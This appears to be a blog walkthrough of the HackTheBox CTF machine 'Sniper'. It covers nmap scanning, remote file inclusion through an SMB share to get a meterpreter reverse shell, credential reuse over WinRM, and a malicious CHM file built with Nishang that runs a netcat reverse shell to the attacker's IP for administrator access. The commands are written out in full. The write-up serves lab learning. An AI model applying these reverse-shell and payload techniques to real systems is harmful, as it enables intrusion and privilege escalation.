Sniper HackTheBox Walkthrough
Today we are going to crack a machine called Sniper. It was created by MinatoTW and felamos. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
- Network Scanning
- Nmap Scan
- Browsing HTTP Service
- Enumerating parameters in URL
- Enumerating RFI
- Exploiting RFI to get meterpreter
- Enumerating Database credentials
- Enumerating Users
- Enumerating Local Services
- Reading User Flag
- Privilege Escalation
- Uploading netcat
- Crafting malicious CHM file
- Uploading malicious CHM
- Executing CHM file to get root
- Reading the Root Flag
To Attack any machine, we need the IP Address. Machine hosted on HackTheBox have a static IP Address.
IP Address assigned: 10.129.1.147
Now that we have the IP Address. We need to enumerate open ports on the machine. For this, we will be running a nmap scan.
nmap -sC -sV 10.129.1.147
The Nmap Version scan quickly gave us some great information. It positively informed that the following ports and services are running: HTTP (80), SMB (135, 139, 445).
We had two options here. One was to enumerate the HTTP service and another was to enumerate the SMB service. We started to enumerate the HTTP service first.
Here we had a simple HTML page with a bunch of buttons. The User Portal is the only one functional.
It contained a Login Panel and a Registration Panel. We tried logging in using some default credentials and then tried to register and all that was for nothing.
Enumerating father got us to the blog page of the website. Tinkering around we clicked on the Language button as shown in the image below.
This changed the URL by adding a parameter of lang and reading a file blog-en.php. This is a File Inclusion. Let’s see what kind of Inclusion is this and can we exploit it?
Since this is a Windows Based Machine, we tried to browse a windows file. At first, we were unable to read it but as soon as we took a look at the source code of the webpage, we found the contents of /windows/win.ini.
mkdir /tmp/share chmod 555 /tmp/share chown -R nobody:nogroup /tmp/share echo "Welcome to Hacking Articles" > /tmp/share/text.txt
We see that it can read a file located on the machine. But can it also locate and read the files that are shared in the network? That’s right we are checking if it is an RFI vulnerability.
For that, we need to configure the SMB so that the target machine can read the file from it. We created a share folder inside the tmp directory and changed its permission to read-only. Then we changed its ownership to nobody so that it can be accessed. At last, we created a text file inside the share folder.
nano /etc/samba/smb.conf service smbd restart
We also need to make some changes in the smb.conf file. We have to change the path and some other configurations shown in the image below. Restart the service after updating the configurations.
We try to read this remote file from the URL and lang parameter. We can read the contents of a shared text file. This is a confirmed case of RFI.
Now time to pop a shell through this RFI. We crafted a windows-based payload using MSFPC. MSFPC creates two files. One is the payload and another is a run command or rc file.
msfpc pc 10.10.14.64
We transfer the payload file to the share folder we created in the tmp directory.
cp php-meterpreter-staged-reverse-tcp-443.php /tmp/share/
Now we execute the run command or rc file on our local machine and sit back and relax. It will set the appropriate LHOST and LPORT and other commands that are required.
msfconsole -q -r '/root/php-meterpreter-staged-reverse-tcp-443-php.rc'
Next, we execute the payload through the web browser by entering the path of the payload file in the lang parameter as shown in the image below.
As soon as the payload is executed, we get a meterpreter session on the target machine. We enumerate the session using sysinfo and pwd command. Our shell landed in C:\inetpub\wwwroot\blog directory. We started to look around and in the wwwroot directory, we found the user folder. We checked the user folder to find a db.php file. Upon reading the db.php file we see that we have successfully enumerated the database password.
sessions 1 sysinfo pwd cd user cat db.php
To hunt for the username, we traversed into the Users Directory. here we found Chris User. We tried entering the Chris User’s directory. We couldn’t get in.
cd C:\\Users cd Chris
Since there are db credentials, there must be a service running associated with it. We enumerate using netstat.
We found a service running on port 5985
We forwarded the removing service on our local machine using the portfwd command.
portfwd add -p 5985 -l 5985 -r 127.0.0.1
Now using Chris as username and the password we got we tried to log in on the service that we forwarded to our local port. We got in. We checked the Desktop of Chris User. We found the user flag.
To elevate privileges, we started enumerating different directories. This is when we found the Docs directory inside C:\ drive. Inside the Docs directory, there was a note.
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you’ve prepared the documentation for our new app. Drop it here when you’re done with it.
Thats bad luck for Chris. But php is not that easy when you get into it.
Well, the CEO is talking about some documentation. Let’s see if we find some. While enumerating Chris’s file we see that he did indeed was creating a set of instructions and we found a chm file by the name of instructions inside Chris’s Downloads folder. For those who don’t know chm files are help files that we used to get on smashing F1 keys on certain applications. Now we need to infect that chm file or replace it with a malicious chm file so as to elevate privileges.
evil-winrm -i 127.0.0.1 -u chris -p '36mEAhz/B8xQ~2VM' cd C:\\Users\Chris\Desktop cat user.txt cd C:\Docs cat note.txt
In any case, we will be needing netcat on windows so why not transfer it. We just made a directory by the name of ignite and uploaded the nc64.exe file to that target machine through meterpreter.
mkdir ignite cd ignite upload /root/Downloads/nc64.exe
Now we searched for some time to find a way to create a malicious chm file. We got to the Out-CHM.ps1 PowerShell script part of the Nishang Toolkit. It can be used for this trick. We downloaded the Out-CHM script to our system. We tried to do this on Kali but we were getting some errors and decided to do this on Windows. In payload we added the command to start nc64.exe that we just uploaded and create a connection to our local machine at port 5555. The Out-CHM script converted this into the doc.chm file.
powershell -ep bypass Import-Module .\Out-CHM.ps1 Out-CHM -Payload "C:\raj\nc64.exe 10.10.14.64 5555 -e cmd.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
We transferred the doc.chm file to the target machine similar to the way we transferred the nc64.exe file.
Invoke-WebRequest -Uri http://10.10.14.64/doc.chm -OutFile c:\docs\doc.chm
Before executing the malicious chm file, we stated a netcat listener at port 5555. Then we executed the chm payload and we got ourselves an Administrator Level Access. We read the root flag to conclude this machine.
nc -lvp 5555 cd C:\User\Administrator\Desktop cat root.txt